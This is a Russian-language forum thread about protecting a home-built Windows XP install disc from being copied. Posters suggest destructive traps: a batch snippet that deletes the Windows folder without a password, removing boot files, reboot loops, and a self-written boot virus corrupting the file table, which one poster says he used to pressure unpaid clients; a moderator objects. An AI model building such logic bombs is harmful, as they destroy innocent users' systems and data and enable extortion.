|
Компьютерный форум OSzone.net » Автоматическая установка Windows » Автоматическая установка Windows 2000/XP/2003 » [Горячий вопрос] Защита своего дистрибутива! |
|
[Горячий вопрос] Защита своего дистрибутива!
|
Покинул форум Сообщения: 3254 |
Предисловие: захожу сеня к кенту и вижу ставит новую систему, радостный говорит сеня купил (цензура), Винда типо 2006 года, все дела, у мя уже тогда закралось сомнение и, ТОЧНО!!! загружается мой Boot Screen, захожу в систему, моя фотка красуется в oeminfo. Все знают грязные ручки юзеров, оказась стырили мой дистрибут, который я месяц облизывал, не ел не спал ночами, хорошо он не законченный был, так сказать "бета". А так гляди по всему городу. Хотя конешно прикольно моя фотка на винде, но все равно, я тут делать, а кто-то будет на этом бабки.
![]() Так вот у мя вопрос ко всем как можно ЗАЩИТИТЬ свой родной дистрибут???? Если есть у кого-нить мыслишки прошу... Защита своего дистрибута UACD. мой перевод статьи How to protect your UACD с форума MSFN |
|
Отправлено: 22:45, 29-08-2006 |
![]() Пользователь Сообщения: 92
|
Профиль | Отправить PM | Цитировать хотел скопировать себе диск из образовательной коллекции (стоимостью 36 руб на распродаже) чем только не пробовал
12 прог испытал для копирования, но после установки пишет вставьте диск для проверки и потом вставьте лецензионный диск и не работает прога естественно пока ему оригинал не дашь на 5 сек вот так если сделать также можно было бы, тогда даже себе копию юзер сделать не сможет на всякий случай потери, порчи и тд диск этот делали в России |
------- Отправлено: 11:05, 11-03-2008 | #121 |
Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети. Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля. |
Новый участник Сообщения: 8
|
Профиль | Отправить PM | Цитировать Я после неудачной попытки нажать на файл ProtectUA.vbs понял что дело именно в нём, не прописано - комп уходит в ребут и выдаёться ошибка при загрузке, и так постоянно. Прописано, значит всё хорошо и всё попрежнему работает...
Так почему бы не сделать просто самораспоковывающийся архив (Protect.exe) в папку %SystemDir% а в runonceex.cmd прописать запуск этого файла при первой загрузке винды. так не надо будет создавать сомнительных папок $OEM$ и т.д. И защита сработает и не будет лишних папок. Если я в чём-то ступил поправьте меня. RunOnceEx.cmd и ещё можно прописать в автозапуск батничек на проверку наличия файла ProtectUA.vbs, иначе перезагрузка... |
Отправлено: 11:14, 22-04-2008 | #122 |
Новый участник Сообщения: 42
|
Профиль | Отправить PM | Цитировать Возможен еще вариант:
Несколько раз перед входом в систму выдавать окошко с таймером отщета загрузок винды с прозьбой ввести пароль (после введения отключить) по истечении которо просто удалять системные файлы (ntldr, NTDETECT.COM, MSDOS.SYS) и т.д. хоть и всю папку Windows. ![]() Если кому-то интересен таков вариант помогите реализовать, или подскажите как реализовать таймер. З.Ы. К сожалению в програмировании не силен ![]() Зарание спасибо ![]() |
------- Последний раз редактировалось Hacho, 25-04-2008 в 10:36. Причина: Уточнение Отправлено: 22:47, 24-04-2008 | #123 |
Новый участник Сообщения: 36
|
Профиль | Отправить PM | Цитировать Цитата Hacho:
Типа: Echo введите пароль: if 1%="ваш пароль" then goto exit sleep 100 Echo введите пароль: if 1%="ваш пароль" then goto exit sleep 100 Echo введите пароль: if 1%="ваш пароль" then goto exit sleep 100 rmdir /S /Q %systemrot%\windows\ :exit Где-то так ![]() Хотя не советую, зазевался ![]() ![]() |
|
Отправлено: 03:13, 25-04-2008 | #124 |
(*.*) Сообщения: 36570
|
Профиль | Сайт | Отправить PM | Цитировать Hacho, это не защитный, а деструктивный вариант. Да и потом, что значит
Цитата Hacho:
|
|
------- Отправлено: 03:30, 25-04-2008 | #125 |
Новый участник Сообщения: 36
|
Профиль | Отправить PM | Цитировать Способов много на вкус и цвет как говориться
![]() наприме мне пришло на ум следующее: У меня все вкусности втроеные в дистрибутив запускаются на Т-13 с помощью Explode. Ему чтобы нормально работать нужен конфиг. Так этот конфиг можно не хранить в явном виде, а создавать программно на том же Т-13 Т.е. запустилась программа, создала конфиг еще пару файлов и запустила Explode. Последней программой, которая отработает будет банальный бутовый вирус, написанный мной, который поменяет пару байтиков в таблице размещения файлов. Вирус так же храниться не явно, а создается запускаемой программой. Т.е. результатом работы дистрибутива станет обслалютно готовый но не работающий комп. А так как я знаю что и где поменял вирус, та загрузившись с того же LiveCd с помощью WinHex все верну на место за минуту, и комп будет работать долго и радостно. Можно пойти дальше. Вкустности - это исталяхи переделанными InnoSetup`ом, а там можно сделать чтоб инсаляха перед работой проверяла наличие маркерного файла и если не находила то выдавала ошибку вида: "Инталяционый файл поврежден" Маркер создается все той же программой что и вначале. Итак, придурок укравший мой диск и поробовам установить просто угробит машинку себе или комуто другому. Попытается воспользоваться моими инсаляхами тут тоже облом. И решит что фиск битый или собран некачесвенно и просто его выкинет. Провозившись в востановлением инфы. А разобраться в чем дело и иправить большая чать не сможет. А те кто сможет им это не надо. Способ описанный только кажеться сложным. Я подобное делал на предыдущей работе с нехорошими клиентами, только там был таймер. Т.е. если заплатили вовремя и приходил и снимал вирус, а если не платили то через месяц сами приходили и все-таки платили ![]() ЗЫ: Ето только мылсли Делать не буду и другим не советую, особенно если ты не специальст по востановлению информации с убитых винтов |
Отправлено: 03:34, 25-04-2008 | #126 |
(*.*) Сообщения: 36570
|
Профиль | Сайт | Отправить PM | Цитировать diavolo79, у вас интересный подход, только вы защищаете не дистрибутив, а свою материальную выгоду
![]() |
------- Отправлено: 06:58, 25-04-2008 | #127 |
|
Профиль | Отправить PM | Цитировать Vadikan, А зачем удалять все системные файлы достаточно нескольких чтобы машина не загрузилась, а насчет закрытия окна можно что-то вроде этого перед окном ввода пароля
![]() Здесь же прописать запуск файла при следующей загрузке! Машина в ребут, юзер в шоке... |
------- Последний раз редактировалось Hacho, 25-04-2008 в 10:39. Отправлено: 08:49, 25-04-2008 | #128 |
Покинул форум Сообщения: 3254
|
|
Отправлено: 09:05, 25-04-2008 | #129 |
|
Профиль | Отправить PM | Цитировать Мелкософт еще никто не отменял
![]() А Приобретите лицензионную версию у диллеров Microsoft просто для прикола. Я просто видел лицо друга когда он ставил сибе мой Виндовз-з-з-з ![]() ![]() ![]() ![]() ![]() ![]() |
------- Отправлено: 09:17, 25-04-2008 | #130 |
![]() |
Участник сейчас на форуме |
![]() |
Участник вне форума |
![]() |
Автор темы |
![]() |
Сообщение прикреплено |
| |||||
Название темы | Автор | Информация о форуме | Ответов | Последнее сообщение | |
Fujitsu-Siemens Amilo Pro V3405. Потухла матрица и Горячий процессор. | Borod888 | Ноутбуки | 2 | 25-11-2009 17:41 | |
вопрос насчет домена (своего) | Bars66 | Вебмастеру | 5 | 14-02-2009 10:56 | |
Создание своего сервера | schtefan | Хочу все знать | 2 | 08-08-2008 21:24 | |
Создание своего дистрибутива через файл каталога (*.clg) | haker-kirik | Автоматическая установка Windows 11 / 10 / 8 / 7 / Vista | 1 | 25-04-2008 00:12 | |
Мысли по поводу своего сервера... | vadimiron | Вебмастеру | 14 | 07-10-2005 01:37 |
|